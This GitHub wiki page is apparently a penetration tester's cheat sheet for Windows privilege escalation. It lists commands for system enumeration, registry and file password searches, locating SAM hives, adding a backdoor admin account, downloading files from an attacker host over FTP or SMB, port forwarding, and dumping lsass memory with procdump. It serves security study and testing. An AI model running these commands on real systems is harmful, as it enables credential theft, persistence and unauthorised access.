Skip to content

Windows Privilege Escalation

Jump to bottom
Jakob Pennington edited this page Feb 27, 2019 · 6 revisions

Common Windows LPE Vectors

  • Hot Potato
  • Kernel Exploits
  • Password Mining - Configuration Files
  • Password Mining - Memory
  • Password Mining - Registry
  • Registry - AlwaysInstallElevated
  • Registry - AutoRun
  • Scheduled Tasks - Missing Binary
  • Services - binpath
  • Services - DDL Hijacking
  • Services - Executable File
  • Services - Registry
  • Services - Unquoted Path
  • Startup Applications

System Enumeration

# System informtion
systeminfo
hostname

# whoami
whoami
echo %username%

# Environment Variables
set

# Firewall
netsh firewall show state
netsh firewall show config

# Network
netstat -ano
ipconfig /all
route print
arp -A

# Connected drives
net use
wmic logicaldisk get caption,description,providername

# System patches
wmic qfe get Caption,Description,HotFixID,InstalledOn

# AlwaysInstallElevated
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated

Users

# Current user
whoami /priv
net users USER_NAME

# List Users
net users
dir /b /ad "C:\Users\\"
dir /b /ad "C:\Documents and Settings\\" # Windows XP and below
qwinsta

# List Groups
net localgroups
whoami /groups

# List domain groups
net group /domain
net group /domain GROUP_NAME

# List administrators
net localgroup Administrators

# Add a new user
net user /add pwned pwned

# Add a user to a group
net localgroup administrators pwned /add
net localgroup "Remote Desktop Users" pwned /add

Files

# List files, with file / folder owner
dir /q FILE_NAME

# List the permissions of a file
cacls FILE_NAME     # <= Windows XP
icacls FILE_NAME    # > Windows XP

Credentials

# Cresential manager
cmdkey /list
dir C:\Users\username\AppData\Local\Microsoft\Credentials\
dir C:\Users\username\AppData\Roaming\Microsoft\Credentials\

# If there are cached admin creds
runas /user:"Administrator" /savecred "cmd /C COMMAND"

# Credentials in registry
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" 2>nul | findstr "DefaultUserName DefaultDomainName DefaultPassword"
reg query "HKCU\Software\ORL\WinVNC3\Password"
reg query "HKLM\SYSTEM\Current\ControlSet\Services\SNMP"
reg query "HKCU\Software\SimonTatham\PuTTY\Sessions"

# Search for credentials in registry
reg query HKLM /f password /t REG_SZ /s
reg query HKCU /f password /t REG_SZ /s

# Files with credentials
C:\sysprep.inf
C:\sysprep\sysprep.xml
C:\unattend.xml
%WINDIR%\Panther\Unattend\Unattended.xml
%WINDIR%\Panther\Unattended.xml

# Or, just search
dir /s *sysprep.inf *sysprep.xml *unattended.xml *unattend.xml *unattend.txt 2>nul

# Search in files
findstr /si password *.txt
findstr /si password *.xml
findstr /si password *.ini
dir C:\*vnc.ini /s /b
dir C:\*ultravnc.ini /s /b
dir C:\ /s /b | findstr /si *vnc.ini

# System files
%SYSTEMROOT%\repair\SAM
%SYSTEMROOT%\System32\config\RegBack\SAM
%SYSTEMROOT%\System32\config\SAM
%SYSTEMROOT%\repair\system
%SYSTEMROOT%\System32\config\SYSTEM
%SYSTEMROOT%\System32\config\RegBack\system

Software

# Installed programs
dir /a "C:\Program Files"
dir /a "C:\Program Files (x86)"
reg query HKEY_LOCAL_MACHINE\SOFTWARE

# Permissions - FULL
icacls "C:\Program Files\*" 2>nul | findstr "(F)" | findstr "Everyone"
icacls "C:\Program Files (x86)\*" 2>nul | findstr "(F)" | findstr "Everyone"
icacls "C:\Program Files\*" 2>nul | findstr "(F)" | findstr "BUILTIN\Users"
icacls "C:\Program Files (x86)\*" 2>nul | findstr "(F)" | findstr "BUILTIN\Users"

# Permissions - Modify
icacls "C:\Program Files\*" 2>nul | findstr "(M)" | findstr "Everyone"
icacls "C:\Program Files (x86)\*" 2>nul | findstr "(M)" | findstr "Everyone"
icacls "C:\Program Files\*" 2>nul | findstr "(M)" | findstr "BUILTIN\Users"
icacls "C:\Program Files (x86)\*" 2>nul | findstr "(M)" | findstr "BUILTIN\Users"

# Permissions - Write
accesschk.exe /accepteula -qwsu "Everyone" *
accesschk.exe /accepteula -qwsu "Authenticated Users" *
accesschk.exe /accepteula -qwsu "Users" *

Services / Scheduled Tasks

# List services
tasklist /svc
tasklist /v
net start
sc query

# Weak service permissions
accesschk.exe /accepteula -uwcqv "Everyone" *
accesschk.exe /accepteula -uwcqv "Authenticated Users" *
accesschk.exe /accepteula -uwcqv "Users" *

# Unquoted service paths
wmic service get name,displayname,pathname,startmode 2>nul |findstr /i "Auto" 2>nul |findstr /i /v "C:\Windows\\" 2>nul |findstr /i /v """
# " < Keeping the markdown interpreter happy

# Scheduled tasks
schtasks /query /fo LIST 2>nul | findstr TaskName
dir C:\windows\tasks

# Startup Programs
wmic startup get caption,command
reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run
reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce
reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run
reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce
dir "C:\Documents and Settings\All Users\Start Menu\Programs\Startup"
dir "C:\Documents and Settings\%username%\Start Menu\Programs\Startup"

Networking

# General network details
ipconfig /all
route print
arp -a
netstat -ano
C:\WINDOWS\System32\drivers\etc\hosts

# Firewall status
netsh firewall show state
netsh firewall show config
netsh advfirewall firewall show rule name=all
netsh advfirewall export "firewall.txt"

# Other network config
netsh dump
reg query HKLM\SYSTEM\CurrentControlSet\Services\SNMP /s

Sensitive Information

# Web server
dir /a C:\inetpub\
dir /s web.config
C:\Windows\System32\inetsrv\config\applicationHost.config

# Web server logs
C:\inetpub\logs\LogFiles\W3SVC1\u_ex[YYMMDD].log
C:\inetpub\logs\LogFiles\W3SVC2\u_ex[YYMMDD].log
C:\inetpub\logs\LogFiles\FTPSVC1\u_ex[YYMMDD].log
C:\inetpub\logs\LogFiles\FTPSVC2\u_ex[YYMMDD].log
dir /s access.log error.log

# Other config files
dir /s p
hp.ini httpd.conf httpd-xampp.conf my.ini my.cnf

Transfer Files

# FTP
echo open ATTACKING_IP_ADDRESS 21> ftp.txt
echo USER ATTACKING USERNAME>> ftp.txt
echo mypassword>> ftp.txt
echo bin>> ftp.txt
echo GET FILENAME>> ftp.txt
echo bye>> ftp.txt
ftp -v -n -s:ftp.txt

# Impacket SMB Server
# Kali - set up the SMB server
smbserver.py KALI `pwd`                         # SMB1
smbserver.py KALI `pwd` -smb2support            # SMB2
# Windows
dir \\IP_ADDRESS\KALI                           # List files / check connection
net use \\IP_ADDRESS\KALI                       # Mount the share
mklink /d  C:\Path\To\Folder \\IP_ADDRESS\Kali  # Create symlink to share
copy \\IP_ADDRESS\KALI\Filename .               # Copy file into current directory

Other Random Tricks

# Port forwarding - plink
plink.exe -l root -pw mysecretpassword 192.168.0.101 -R 8080:127.0.0.1:8080

# Port forwarding - meterpreter
portfwd add -l <attacker port> -p <victim port> -r <victim ip>
portfwd add -l 3306 -p 3306 -r 192.168.1.101

Privesc Guides

Windows Privilege Escalation Fundamentals - Fuzzy Security

Windows Privilege Escalation Guide - absolomb

Windows / Linux Lovel Privilege Escalation Workshop - sagishahar

Transferring Files from Kali to Windows - ropnop

Tools

Microsoft Sysinternals

accesschk.exe with /accepteula flag - Sysinternals tools to check for permissions on files, directories, registry keys and services.

PsTools - Another set of Sysinternal tools, including PsExec to execute processes through SMB. Alternatively, mount the sysinternals drive to save having to copy / remove them.

net use Z: \\http://live.sysinternals.com \tools\ "/user:"
dir Z:
Z:\procdump -accepteula -ma lsass.exe lsassdmp

Some tips on Windows Privilege Escalation

  • Try running commands on your own machine first to test syntax - it can be far easier than trying to debug remotely.

Contents

Home
The Basics
Scanning and Enumeration
Exploitation
Post Exploitation
Linux Privilege Escalation
Windows Privilege Escalation
Buffer Overflows
Resources

Get in touch

Blog
Email
LinkedIn
Twitter
Website

Clone this wiki locally